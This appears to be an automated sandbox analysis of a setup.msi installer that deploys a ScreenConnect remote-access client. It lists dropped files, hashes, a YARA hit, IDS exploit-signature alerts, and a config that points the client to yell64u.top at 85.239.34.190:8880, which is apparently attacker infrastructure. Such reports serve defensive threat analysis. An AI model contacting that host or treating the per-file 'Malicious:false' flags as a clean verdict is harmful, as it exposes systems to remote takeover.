                                                              MD5:ED78BAD542629E617AE49DFEFFABCFCC
                                                              SHA1:BF5EFE919B3C3561C433D9D4CD0F323A9359017E
                                                              SHA-256:86231CCA7231E3905A7317D07350C19F3923E24F34732C0AA6C022599913B1A3
                                                              SHA-512:45157229E4E2F6C5730ED1D1A233928538D7C7C71F549D8552CBE077F6DC22F7CDC390631696E8024C443B69979D8B4D8983142B6B93375ECE5B4F4F4609AA3F
                                                              Malicious:false
                                                              Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):430957
                                                              Entropy (8bit):6.617260991920889
                                                              Encrypted:false
                                                              SSDEEP:6144:WuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqv+ssQ:WuH2anwohwQUv5uH2anwohwQUv+ssQ
                                                              MD5:56DDBE6E146592EE51DBF635CCC29CF8
                                                              SHA1:455EAE073351ED2A29F01ADF3D2E19B299BAB5BE
                                                              SHA-256:89062997E1DF3EBEB5AF1A95111B23879082CBFDA3D73D0BD05DAA8F015B732C
                                                              SHA-512:C4089FE649F9A637229F50020E8670789441D8AEC23E63893B615C9F6EEFE4AC2E3ED99E71D8AD31CB394F8E6752F459793C8996100D1E68AF5133B4594BAC54
                                                              Malicious:false
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI15E9.tmp, Author: Joe Security
                                                              Preview:...@IXOS.@.....@.|mY.@.....@.....@.....@.....@.....@......&.{64D6109D-BB46-4239-08D9-EC110E53E92E}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}^.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}f.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}c.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):207360
                                                              Entropy (8bit):6.573348437503042
                                                              Encrypted:false
                                                              SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                              MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                              SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                              SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                              SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):207360
                                                              Entropy (8bit):6.573348437503042
                                                              Encrypted:false
                                                              SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                              MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                              SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                              SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                              SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.1617053516056106
                                                              Encrypted:false
                                                              SSDEEP:12:JSbX72FjuJaAGiLIlHVRpMh/7777777777777777777777777vDHFeoGzjPlp3Xz:JVQI5c8oGzP6F
                                                              MD5:100E9446ECA4A817AF5E25E8877624B8
                                                              SHA1:3EBC386F84CE535216944758451F70F591F1D141
                                                              SHA-256:6A204983B89518995CA7767A412C398DF72D3B196F60E8120F672296CB23F6C3
                                                              SHA-512:78BCF274DB5B1AB776A721296656605A38A6F5BA9F9C00814A2DF548C840BE1DD0FEF3ABED358CD4399D83DA56A96BC49605CB6B4155946490FE869D89C3BA08
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.7782821701958873
                                                              Encrypted:false
                                                              SSDEEP:48:M8PhRuRc06WXOCjT5Py4NC+qcq56AduNSiAUWdZq+ommXrz4RLoMrGAduNSID:jhR1UjTX+pYf7WdwLmm34Ry
                                                              MD5:6381CC5ECAF29A97B3C46473738A3B35
                                                              SHA1:E8448EB727C76E6CEA668280D7732AD6823A7386
                                                              SHA-256:2CAA7794845660F494E447DB67E56E0882849EB96727E0B34ACB459A585CA66F
                                                              SHA-512:2E859B612DBB99F8B3DEE0CCD0BAC1EFAE19ADE250F1582C72AF4BF2C6C6E1C72CFBBF1AC49F35C1DFFA4504D87A80CD79C5E6799358CF952A0281EF6956C800
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel
                                                              Category:dropped
                                                              Size (bytes):7668
                                                              Entropy (8bit):7.864444854228408
                                                              Encrypted:false
                                                              SSDEEP:192:NN78fxDBmgwVRjuzFN78fxDBmgwVRjuzFN78fxDBmgwVRjuzc:NN78dB742N78dB742N78dB74d
                                                              MD5:55A6B0132343F5FC425515F0E29A5A53
                                                              SHA1:CC8FE5C184EBB14AD6D835D8E743F4FC2678CB10
                                                              SHA-256:A6663FB9874ABA9B9C1958D2D17470B73E1C95621A503454B2D0F941F989EAA6
                                                              SHA-512:4F57298141165351CCE82CCCD9CAE456591253C9BEB753645D92B73D933F8405CD22011FC0E8C488A2CD3D3B54C7AF327F2869432EE92C1C41B0F4474D6C6BE9
                                                              Malicious:false
                                                              Preview:..................6... .......... ...00...............PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.m#x....X.rYn....R_.ds...*.*......V..x[$]..}.*..b...". ...,....*|.F`.....E[`\6...G.m..$.K...IxAb..^."....@.^..G....bK.....F.+.E.*..p......2WBk......8...p......_u.mR.6.......xs.....jHX.)l....KA..F...u_}.G.pF.`.i....K..JQ.C..cc..[..-06.d{...%TtG..'.....9.W5W.~)..Qlx.d.gT....gX.#L..4{......cG..h..$...ie.....W..)X...#o..dku..[.VQp..c?...........)..+w.p.H....I...:...r...6?....V...{.R...?.w..i......sC[..R.t!_v.A.....-kzL.8...d.(..6I.....&.R..1.....p.?.Vt..@>^....{p.s.[..c9.k~k.B....(.......%=........x6.6*:..Vu.. ......".;g..f....o}..+..n.w..%.j.0...X:.^...o....$.8@M]B..J..R.. ..a....n.<.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):432221
                                                              Entropy (8bit):5.375176928380616
                                                              Encrypted:false
                                                              SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauv:zTtbmkExhMJCIpEra
                                                              MD5:7E49880BBE004F397878B83A3ADE2FE1
                                                              SHA1:F9BACABB066B0C8AAF2F5B42395E3DE7FFCC1F19
                                                              SHA-256:E68E9EB8CE0AB865ECA549B1AAEE0EBD8EFB26E9FBF86B5D557771228F68FAB1
                                                              SHA-512:815F3E9969D300BE5E1DD116F53D05DF13A3D450DFA8F6DE73B2076285B5F462A47C81572C7A66DDBA50CC4184F5F26459827C150187A059FB7D3C0FC83FC737
                                                              Malicious:false
                                                              Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                              Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):556
                                                              Entropy (8bit):5.037767210511845
                                                              Encrypted:false
                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUibO/vXbAa3xT:2dL9hK6E46YP6ovH
                                                              MD5:8731132A8C548A410408DEF9AA44CB91
                                                              SHA1:428CFDFEB1B7AF8EB4B3910C21E60A429FCF69DF
                                                              SHA-256:02B9AB1A2BC8B540D457AEBCB4B2F047DB0713C7B9A7CB994B345863AA2E2667
                                                              SHA-512:C5A6A74F706668732B2476862532BD4320C57B0509E2109F1205E94B623E31E24FAD8BB7DF17FEDC89AA661D9E55741EB2ED538EE40B9D81587C58FD3559D818
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-13%2f11%2f2024%2020%3a32%3a10</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                              Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):556
                                                              Entropy (8bit):5.037767210511845
                                                              Encrypted:false
                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUibO/vXbAa3xT:2dL9hK6E46YP6ovH
                                                              MD5:8731132A8C548A410408DEF9AA44CB91
                                                              SHA1:428CFDFEB1B7AF8EB4B3910C21E60A429FCF69DF
                                                              SHA-256:02B9AB1A2BC8B540D457AEBCB4B2F047DB0713C7B9A7CB994B345863AA2E2667
                                                              SHA-512:C5A6A74F706668732B2476862532BD4320C57B0509E2109F1205E94B623E31E24FAD8BB7DF17FEDC89AA661D9E55741EB2ED538EE40B9D81587C58FD3559D818
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-13%2f11%2f2024%2020%3a32%3a10</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                              Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1590
                                                              Entropy (8bit):5.363907225770245
                                                              Encrypted:false
                                                              SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                              MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                              SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                              SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                              SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.7782821701958873
                                                              Encrypted:false
                                                              SSDEEP:48:M8PhRuRc06WXOCjT5Py4NC+qcq56AduNSiAUWdZq+ommXrz4RLoMrGAduNSID:jhR1UjTX+pYf7WdwLmm34Ry
                                                              MD5:6381CC5ECAF29A97B3C46473738A3B35
                                                              SHA1:E8448EB727C76E6CEA668280D7732AD6823A7386
                                                              SHA-256:2CAA7794845660F494E447DB67E56E0882849EB96727E0B34ACB459A585CA66F
                                                              SHA-512:2E859B612DBB99F8B3DEE0CCD0BAC1EFAE19ADE250F1582C72AF4BF2C6C6E1C72CFBBF1AC49F35C1DFFA4504D87A80CD79C5E6799358CF952A0281EF6956C800
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.7782821701958873
                                                              Encrypted:false
                                                              SSDEEP:48:M8PhRuRc06WXOCjT5Py4NC+qcq56AduNSiAUWdZq+ommXrz4RLoMrGAduNSID:jhR1UjTX+pYf7WdwLmm34Ry
                                                              MD5:6381CC5ECAF29A97B3C46473738A3B35
                                                              SHA1:E8448EB727C76E6CEA668280D7732AD6823A7386
                                                              SHA-256:2CAA7794845660F494E447DB67E56E0882849EB96727E0B34ACB459A585CA66F
                                                              SHA-512:2E859B612DBB99F8B3DEE0CCD0BAC1EFAE19ADE250F1582C72AF4BF2C6C6E1C72CFBBF1AC49F35C1DFFA4504D87A80CD79C5E6799358CF952A0281EF6956C800
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):0.0690752581717308
                                                              Encrypted:false
                                                              SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOeoGzpxrGNgGyVky6l3X:2F0i8n0itFzDHFeoGzjPE3X
                                                              MD5:55346CF55DF51C483C9E6F0D7483AFA8
                                                              SHA1:B90A551D8DDF776D2A5E17813F54A867ECDBF460
                                                              SHA-256:D4FA5ABE7AB47B9BF42F3453FE11931EB47760AEFA519B989169066435F3BF75
                                                              SHA-512:1B707F4FAB1BD24F07A7ECDDCBF8823846EDD8442F2238E0FA19531F5E9C29919E0F654630F933C341F23AEA37E543E1B6B121A4BD5849545A1D6C235F2B434A
                                                              Malicious:false
                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):1.404588811757629
                                                              Encrypted:false
                                                              SSDEEP:48:repudGMLFXO1T5bUAy4NC+qcq56AduNSiAUWdZq+ommXrz4RLoMrGAduNSID:6pKoTdf+pYf7WdwLmm34Ry
                                                              MD5:C7114F562BC601FF630C6624B7FF87AE
                                                              SHA1:169A7AC109B3F5C54B964703BFF4D3542DBCDCD1
                                                              SHA-256:37975954B216DB95D2306DA7EDEF36005D6D777192D6CCC7B7CDBC9432602998
                                                              SHA-512:DD347FB5FAA49D7A9FD40935B19EED1CAD746213C1F717F4C3F68F480AC460FDBA8F3460CDC931D8D85AB904D90FD7878D8294DB833D399F6A4B466457D92C4B
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):1.404588811757629
                                                              Encrypted:false
                                                              SSDEEP:48:repudGMLFXO1T5bUAy4NC+qcq56AduNSiAUWdZq+ommXrz4RLoMrGAduNSID:6pKoTdf+pYf7WdwLmm34Ry
                                                              MD5:C7114F562BC601FF630C6624B7FF87AE
                                                              SHA1:169A7AC109B3F5C54B964703BFF4D3542DBCDCD1
                                                              SHA-256:37975954B216DB95D2306DA7EDEF36005D6D777192D6CCC7B7CDBC9432602998
                                                              SHA-512:DD347FB5FAA49D7A9FD40935B19EED1CAD746213C1F717F4C3F68F480AC460FDBA8F3460CDC931D8D85AB904D90FD7878D8294DB833D399F6A4B466457D92C4B
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):69632
                                                              Entropy (8bit):0.22547669897639744
                                                              Encrypted:false
                                                              SSDEEP:48:ODBAduNS3qcq56AduNSiAUWdZq+ommXrz4RLoMr1up40:YxpYf7WdwLmm34Rw
                                                              MD5:684DB2F84E0877AE894F33B40B49C7AE
                                                              SHA1:BB66CC332B24F23BE5FC2EE51579DB50348F4A74
                                                              SHA-256:E8F16D7B939E650A2DF3E7D878DD7977C2DA5FCAE69A45BEDC2B8819F2FE9675
                                                              SHA-512:4E4417C736D7A52599A250B222CA3FACFF89DB00C9FC727EE2A43CB84FF273D02393538D55CBC583AC8D64A3030A3875CB30255AA139F7ED25FCF374CDE03031
                                                              Malicious:false
                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):1.404588811757629
                                                              Encrypted:false
                                                              SSDEEP:48:repudGMLFXO1T5bUAy4NC+qcq56AduNSiAUWdZq+ommXrz4RLoMrGAduNSID:6pKoTdf+pYf7WdwLmm34Ry
                                                              MD5:C7114F562BC601FF630C6624B7FF87AE
                                                              SHA1:169A7AC109B3F5C54B964703BFF4D3542DBCDCD1
                                                              SHA-256:37975954B216DB95D2306DA7EDEF36005D6D777192D6CCC7B7CDBC9432602998
                                                              SHA-512:DD347FB5FAA49D7A9FD40935B19EED1CAD746213C1F717F4C3F68F480AC460FDBA8F3460CDC931D8D85AB904D90FD7878D8294DB833D399F6A4B466457D92C4B
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {64D6109D-BB46-4239-08D9-EC110E53E92E}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                              Entropy (8bit):7.966821211716796
                                                              TrID:
                                                              • Microsoft Windows Installer (60509/1) 57.88%
                                                              • ClickyMouse macro set (36024/1) 34.46%
                                                              • Generic OLE2 / Multistream Compound File (8008/1) 7.66%
                                                              File name:setup.msi
                                                              File size:13'422'592 bytes
                                                              MD5:ed78bad542629e617ae49dfeffabcfcc
                                                              SHA1:bf5efe919b3c3561c433d9d4cd0f323a9359017e
                                                              SHA256:86231cca7231e3905a7317d07350c19f3923e24f34732c0aa6c022599913b1a3
                                                              SHA512:45157229e4e2f6c5730ed1d1a233928538d7c7c71f549d8552cbe077f6dc22f7cdc390631696e8024c443b69979d8b4d8983142b6b93375ece5b4f4f4609aa3f
                                                              SSDEEP:196608:h53JLR3LGMLiW35+53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53JZ:bTiuyTXTtTPTkTzT
                                                              TLSH:7CD6233163F88868E5B75BBDED7684A06836BC61DE22D11F42697A0C1A70F409B73773
                                                              File Content Preview:........................>.......................................................{...j..........................................................................................................................................................................
                                                              Icon Hash:2d2e3797b32b2b99
                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-11-13T21:32:24.311224+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449731TCP
                                                              2024-11-13T21:33:02.882749+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449737TCP
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 13, 2024 21:32:11.251332045 CET497308880192.168.2.485.239.34.190
                                                              Nov 13, 2024 21:32:11.256730080 CET88804973085.239.34.190192.168.2.4
                                                              Nov 13, 2024 21:32:11.257474899 CET497308880192.168.2.485.239.34.190
                                                              Nov 13, 2024 21:32:11.889180899 CET497308880192.168.2.485.239.34.190
